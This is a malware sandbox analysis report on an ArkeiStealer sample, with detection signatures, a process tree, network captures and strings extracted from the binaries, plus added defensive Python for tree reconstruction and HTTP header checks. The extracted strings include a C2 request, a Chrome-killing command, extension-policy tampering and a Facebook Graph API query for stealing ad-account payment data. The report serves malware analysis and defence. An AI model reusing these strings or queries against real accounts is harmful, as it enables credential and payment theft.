
Analysis Report KeJ7Cl7flZ.exe

Overview

General Information

Sample Name: KeJ7Cl7flZ.exe
Analysis ID: 324174
MD5: 4e759849412063c6590936671ce4aa0e
SHA1: 40d132516cc4b9aa00dca2b2f068c439cf8f59c3
SHA256: 7a79f0c95e891b939e275fa19e641b676f2eb70471945fb3b15d6a649cafe071
Tags: ArkeiStealer, exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • KeJ7Cl7flZ.exe (PID: 4576 cmdline: 'C:\Users\user\Desktop\KeJ7Cl7flZ.exe' MD5: 4E759849412063C6590936671CE4AA0E)
    • 002.exe (PID: 3568 cmdline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe' MD5: 6503C9C4F19A4B33B701CC5B97B349BC)
      • WerFault.exe (PID: 204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 740 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • Setup.exe (PID: 6668 cmdline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe' MD5: 62EAEA103DD9BEB69E884F2EDE1ACD63)
      • setup.exe (PID: 6732 cmdline: 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s MD5: D64E3CC11AFC6331715BDFEC5F26C2A0)
        • aliens.exe (PID: 1112 cmdline: 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe' MD5: 0F88FD9D557FFBE67A8897FB0FC08EE7)
    • jg2_2qua.exe (PID: 5292 cmdline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe' MD5: 676757904C8383FD9ACBEED15AA8DCC4)
  • cleanup
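The tree above is a WinRAR self-extractor at work: RarSFX0 is the directory a WinRAR SFX stub unpacks to under %TEMP%, and the sample runs three payloads from there, one of which (Setup.exe) chains through a second installer in sib309A.tmp and lands aliens.exe in Program Files. As an added example, not part of the report or of any of the binaries, the following rebuilds the same tree from process-creation events and flags what ran out of the staging directory and what a staged process later spawned. The EVENTS list is constructed from the Startup section (PIDs and image paths as listed there); the field names loosely follow Sysmon Event ID 1 and are an assumption, as is ppid 0 for the root, which the report does not give.

```python
"""Rebuild a process tree from process-creation events and flag what ran
out of a self-extracting archive's staging directory.

Added example for this report, not Joe Sandbox code. EVENTS is constructed
from the Startup section (PIDs and images as listed); field names are an
assumption modelled on Sysmon Event ID 1, and ppid 0 for the root is assumed.
"""
import ntpath
import re
from collections import defaultdict

EVENTS = [
    {"pid": 4576, "ppid": 0,
     "image": r"C:\Users\user\Desktop\KeJ7Cl7flZ.exe"},
    {"pid": 3568, "ppid": 4576,
     "image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe"},
    {"pid": 204, "ppid": 3568,   # crash handler; the report lists two WerFault entries for PID 204
     "image": r"C:\Windows\SysWOW64\WerFault.exe"},
    {"pid": 6668, "ppid": 4576,
     "image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe"},
    {"pid": 6732, "ppid": 6668,
     "image": r"C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe"},
    {"pid": 1112, "ppid": 6732,
     "image": r"C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe"},
    {"pid": 5292, "ppid": 4576,
     "image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe"},
]

# WinRAR SFX stubs unpack into %TEMP%\RarSFX<n>\ and run the payload from there.
SFX_STAGING = re.compile(r"\\AppData\\Local\\Temp\\RarSFX\d+\\", re.IGNORECASE)
# OS binaries under C:\Windows (e.g. WerFault.exe) are not payloads; tuning assumption.
SYSTEM_IMAGE = re.compile(r"^[a-z]:\\Windows\\", re.IGNORECASE)


def build_tree(events):
    """Return (by_pid, children): event lookup by pid and child pids per parent."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def ancestry(pid, by_pid):
    """Follow ppid links upward; stops at the first pid with no event (e.g. ppid 0)."""
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid]["ppid"]
    return chain  # [pid, parent, grandparent, ...]


def is_sfx_staged(event):
    return bool(SFX_STAGING.search(event["image"]))


def flag_sfx_chain(events):
    """Map pid -> 'staged' (image runs straight out of RarSFX<n>) or
    'spawned' (runs elsewhere but descends from a staged process, which is how
    a second-stage installer that copied itself into Program Files shows up)."""
    by_pid, _ = build_tree(events)
    findings = {}
    for e in events:
        if SYSTEM_IMAGE.match(e["image"]):
            continue
        if is_sfx_staged(e):
            findings[e["pid"]] = "staged"
            continue
        if any(is_sfx_staged(by_pid[a]) for a in ancestry(e["ppid"], by_pid)):
            findings[e["pid"]] = "spawned"
    return findings


def render_tree(events, root_pid):
    """Indented text tree with the finding label appended to flagged nodes."""
    by_pid, children = build_tree(events)
    findings = flag_sfx_chain(events)
    lines = []

    def walk(pid, depth):
        label = findings.get(pid)
        tag = f"  [{label}]" if label else ""
        lines.append(f"{'  ' * depth}{pid} {ntpath.basename(by_pid[pid]['image'])}{tag}")
        for child in children[pid]:
            walk(child, depth + 1)

    walk(root_pid, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_tree(EVENTS, 4576))
```

On the report's tree this marks 002.exe, Setup.exe and jg2_2qua.exe as staged and both setup.exe (sib309A.tmp) and aliens.exe as spawned; WerFault.exe is skipped by the system-image rule even though its parent is staged.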

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000013.00000002.511085870.0000000003310000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source | Rule | Description | Author | Strings
19.2.aliens.exe.3310000.5.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
19.2.aliens.exe.10000000.6.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
19.2.aliens.exe.3310000.5.raw.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Avira: detection malicious, Label: HEUR/AGEN.1139239
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Avira: detection malicious, Label: TR/Siggen.lhhpy
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe | Avira: detection malicious, Label: TR/Crypt.CFI.Gen
Source: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe | Avira: detection malicious, Label: TR/Crypt.CFI.Gen
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe | Avira: detection malicious, Label: HEUR/AGEN.1134829
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Avira: detection malicious, Label: TR/AD.PredatorThief.gldkk
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe | Avira: detection malicious, Label: TR/AD.JamkeeDldr.gwmgy
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe | Avira: detection malicious, Label: TR/AD.ColtyStealer.mwfxd
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe | Avira: detection malicious, Label: HEUR/AGEN.1138531
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exe | Avira: detection malicious, Label: TR/Kryptik.ijozo
Multi AV Scanner detection for domain / URL
Source: jojo-soft.xyz | VirusTotal: Detection: 8%
Source: evograph.ro | VirusTotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: KeJ7Cl7flZ.exe | VirusTotal: Detection: 67%
Source: KeJ7Cl7flZ.exe | ReversingLabs: Detection: 79%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: KeJ7Cl7flZ.exe | Joe Sandbox ML: detected
Source: 19.2.aliens.exe.2f00000.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 26.0.jg2_2qua.exe.400000.0.unpack | Avira: Label: TR/Crypt.CFI.Gen
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_10003535 CryptUnprotectData,_malloc,_memset,_memmove,__snprintf_s,_free,LocalFree,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Code function: 0_2_00EC29A3 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Code function: 0_2_00ED0BA0 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Code function: 0_2_00EDFB78 FindFirstFileExA,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Code function: 0_2_00ED2E67 VirtualQuery,GetSystemInfo,FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_012746B9 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_10009DF3 _memset,GetEnvironmentVariableW,_wprintf,FindFirstFileW,__snprintf_s,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_6FEE0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_6FED1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Code function: 17_2_0005A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Code function: 17_2_0006B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Code function: 17_2_0007A928 FindFirstFileExA,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_0045DD7C FindFirstFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | File opened: C:\Users\user\Desktop\desktop.ini

Networking:

May check the online IP address of the machine
Source: unknown | DNS query: name: iplogger.org
Source: unknown | DNS query: name: ip-api.com
Source: Joe Sandbox View | IP Address: 88.99.66.31
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
  GET /seemorebty/il.php?e=jg2_2qua HTTP/1.1
  Connection: Keep-Alive
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
  Accept-Language: en-US,en;q=0.9
  Referer: https://www.facebook.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
  Host: 101.36.107.74
Source: unknown | TCP traffic detected without corresponding DNS query: 101.36.107.74 (listed six times)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_1000AA5D _memset,_memset,_memset,_memset,_memset,InternetCrackUrlA,__time64,_rand,InternetOpenA,_wprintf,InternetConnectA,_wprintf,InternetCloseHandle,HttpOpenRequestA,_wprintf,InternetCloseHandle,InternetCloseHandle,HttpAddRequestHeadersA,InternetSetOptionA,LdrInitializeThunk,LdrInitializeThunk,HttpSendRequestA,GetLastError,HttpQueryInfoA,_wprintf,_wprintf,InternetReadFile,_memset,GetLastError,_wprintf,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,LdrInitializeThunk,LdrInitializeThunk,
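The GET request recorded above carries several HTTP-layer tells at once: a Chrome user agent sent to a bare IP address in Host, a Referer of https://www.facebook.com for a request that is not going to Facebook, and Accept and User-Agent values whose '/' separators are missing ("image webp", "Chrome 70.0.3538.110"), which no real browser produces and which also appear in the sample's own strings further down. The following is an added example, not code from the report or from the sample, that parses a raw request and reports those tells. CAPTURED_REQUEST is the request above with its CRLF line breaks restored and header values kept exactly as captured; BENIGN_REQUEST is constructed; treating iplogger.org and ip-api.com as IP-lookup services is an assumption taken from the DNS queries listed above.

```python
"""Flag HTTP-layer tells in a captured request.

Added example for this report, not Joe Sandbox code. CAPTURED_REQUEST is
reconstructed from the GET recorded in the report with CRLF line breaks
restored; Accept and User-Agent are kept exactly as captured. BENIGN_REQUEST
is constructed. IP_CHECK_HOSTS is an assumption drawn from the report's DNS
queries.
"""
import ipaddress
import re
from urllib.parse import urlsplit

CAPTURED_REQUEST = (
    "GET /seemorebty/il.php?e=jg2_2qua HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,"
    "image webp,image apng, q=0.8,application signed-exchange v=b3\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Referer: https://www.facebook.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 "
    "(KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36\r\n"
    "Host: 101.36.107.74\r\n"
    "\r\n"
)

BENIGN_REQUEST = (  # constructed: the shape a real Chrome build sends
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
    "Referer: https://www.example.com/\r\n"
    "\r\n"
)

IP_CHECK_HOSTS = {"iplogger.org", "ip-api.com"}
# Product tokens a browser always writes as Name/Version, never "Name Version".
BROWSER_PRODUCTS = ("AppleWebKit", "Chrome", "Safari", "Firefox")


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, target, version and a
    lower-cased header dict (a repeated header keeps its last value)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def is_literal_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyze_request(raw):
    """Return a list of human-readable findings; an empty list means nothing odd."""
    headers = parse_request(raw)["headers"]
    host = urlsplit("//" + headers.get("host", "")).hostname or ""
    ua = headers.get("user-agent", "")
    claims_browser = ua.startswith("Mozilla/")
    findings = []

    # 1. A browser UA addressing a bare IP: pages are not navigated to that way.
    if claims_browser and is_literal_ip(host):
        findings.append(f"browser UA but Host is a literal IP: {host}")

    # 2. Known "what is my IP" services (the report shows DNS queries for both).
    if host in IP_CHECK_HOSTS:
        findings.append(f"request to IP-lookup service: {host}")

    # 3. Referer naming a site the request is not going to (a forged Referer).
    ref_host = urlsplit(headers.get("referer", "")).hostname or ""
    if claims_browser and ref_host and ref_host != host:
        findings.append(f"Referer host {ref_host} does not match Host {host}")

    # 4. Accept media ranges must be type/subtype; "image webp" is not one.
    for token in headers.get("accept", "").split(","):
        media = token.split(";", 1)[0].strip()
        if media and "/" not in media:
            findings.append(f"malformed Accept media range: {media!r}")

    # 5. Product tokens with a space instead of '/' ("Chrome 70.0" vs "Chrome/70.0").
    for product in BROWSER_PRODUCTS:
        if re.search(rf"\b{product} \d", ua):
            findings.append(f"User-Agent product without version separator: {product}")

    return findings


if __name__ == "__main__":
    for finding in analyze_request(CAPTURED_REQUEST):
        print(finding)
```

The malformed-token checks (4 and 5) are the cheapest to run at a proxy because they do not depend on knowing the destination: a client that emits "image webp" is not a browser, whatever its User-Agent says.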
Source: askinstall21.exeString found in binary or memory: %02X%02X%02X%02X%02X%02Xcmd.exe /c taskkill /f /im chrome.exeDefault\js\background.js5.18.6_0\fnfhfpkmpnmlmlgfeabpegnfpdnmokcoconst mac = '';const channelid ='const version='SOFTWARE\Policies\Google\Chrome\ExtensionInstallWhitelist99extensions.settings.\u003C<extensionssettingsprotectionmacssuper_mac107\Temp\vnnsfgfgfghaz99\" /s /e /y" "xcopy " --window-position=-50000,-50000 --user-data-dir=" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/","message":"","code":"{"type":"installresult","uid":"successerr : write reg failed(RegCreateKeyExA)err : write reg failed(RegSetValueExA)err : extension dir not found(possible no chrome installed)err : zip release failederr : securepref not founderr : parse json failederr : unknown1","channelid":"","adminmode":""}","version":"JSON=application/x-www-form-urlencoded;charset=utf-8http://www.fddnice.pw//Home/Index/lkdinlhttp://12https://iplogger.org/1uVkt796https://iplogger.org/1TW3i797https://iplogger.org/1q6Jt7105https://iplogger.org/1O2BH106https://iplogger.org/1OZVHhttps://iplogger.org/1OXFG108https://iplogger.org/1lC5g109https://iplogger.org/1Ka7t7110https://iplogger.org/1OhAG111https://iplogger.org/16ajh7112https://iplogger.org/1XSq97113https://iplogger.org/19iM77114https://iplogger.org/16xjh7115https://iplogger.org/1XJq97116https://iplogger.org/1XKq97117https://iplogger.org/1X8M97118https://iplogger.org/1UpU57119https://iplogger.org/1T79i7120https://iplogger.org/1T89i7121https://iplogger.org/1Uts87122https://iplogger.org/1KyTy7123https://iplogger.org/1yXwr7124https://iplogger.org/1bV787125https://iplogger.org/1b4887\/ equals www.facebook.com (Facebook)
Source: askinstall21.exe | String found in binary or memory: https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/ equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpString found in binary or memory: &ctarget=https%3A%2F%2Fwww.facebook.comcquick=jsc_c_e&cquick_token=/settings?find email</strong><strong>fbSettingsListItemContentEmail not found.0" title="href="https://www.facebook.com/profile_icondata-gt" role="<a aria-label=<a class=*/profile.php?sk=friend_gs6">,"Friends":"</span><span>,"status":","Page":"1<a href="https://business.facebook.com,"bm":"<>class="lastRow right","currency":","a":","b":"CHROME,"Channel":","Browser":"}]0102030405060708"username":"edge_followed_by":{"count":edge_follow":{"count":email":"username":"phone_number":"gender":first_name":"last_name":"{#},"br":"","yo":""pa":""us":""re":""ph":""se":""fs":,"fsr":"Channel":""xtype":2}]Failed to initialise Winsock, Error:%u equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: ....https://www.facebook.com/pages/?category=your_pages&ref=bookmarksuri_token"has_main_page":"https://business.facebook.com/select/?next=https%3A%2F%2Fbusiness.facebook.com%2F"has_BM":"https://www.facebook.com/ads/manager/account_settings/information/?act=%s&pid=p1&page=account_settings&tab=account_information"AdsCMConnectConfig",\[\],.?access_token:"(.+?)""AdsInterfacesSessionConfig",\[\],.?"sessionID":"(.+?)"https://graph.facebook.com/v7.0/act_%s?access_token=%s&_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&_sessionID=%s&fields=%%5B%%22all_payment_methods%%7Bpayment_method_altpays%%7Baccount_id%%2Ccountry%%2Ccredential_id%%2Cdisplay_name%%2Cimage_url%%2Cinstrument_type%%2Cnetwork_id%%2Cpayment_provider%%2Ctitle%%7D%%2Cpm_credit_card%%7Baccount_id%%2Ccredential_id%%2Ccredit_card_address%%2Ccredit_card_type%%2Cdisplay_string%%2Cexp_month%%2Cexp_year%%2Cfirst_name%%2Cis_verified%%2Clast_name%%2Cmiddle_name%%2Ctime_created%%2Cneed_3ds_authorization%%2Csupports_recurring_in_india%%2Cverify_card_behavior%%7D%%2Cpayment_method_direct_debits%%7Baccount_id%%2Caddress%%2Ccan_verify%%2Ccredential_id%%2Cdisplay_string%%2Cfirst_name%%2Cis_awaiting%%2Cis_pending%%2Clast_name%%2Cmiddle_name%%2Cstatus%%2Ctime_created%%7D%%2Cpayment_method_extended_credits%%7Baccount_id%%2Cbalance%%2Ccredential_id%%2Cmax_balance%%2Ctype%%2Cpartitioned_from%%2Csequential_liability_amount%%7D%%2Cpayment_method_paypal%%7Baccount_id%%2Ccredential_id%%2Cemail_address%%2Ctime_created%%7D%%2Cpayment_method_stored_balances%%7Baccount_id%%2Cbalance%%2Ccredential_id%%2Ctotal_fundings%%7D%%2Cpayment_method_tokens%%7Baccount_id%%2Ccredential_id%%2Ccurrent_balance%%2Co